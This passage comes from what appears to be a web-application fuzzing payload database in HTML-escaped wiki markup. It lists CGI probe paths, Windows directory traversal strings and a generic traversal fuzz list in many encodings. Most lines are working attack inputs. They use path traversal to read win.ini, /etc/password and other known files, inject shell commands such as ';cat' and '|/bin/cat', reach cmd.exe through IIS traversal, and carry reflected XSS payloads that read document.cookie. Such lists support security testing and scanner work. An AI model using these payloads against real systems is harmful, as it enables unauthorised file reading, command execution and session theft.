search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (77 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (7 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
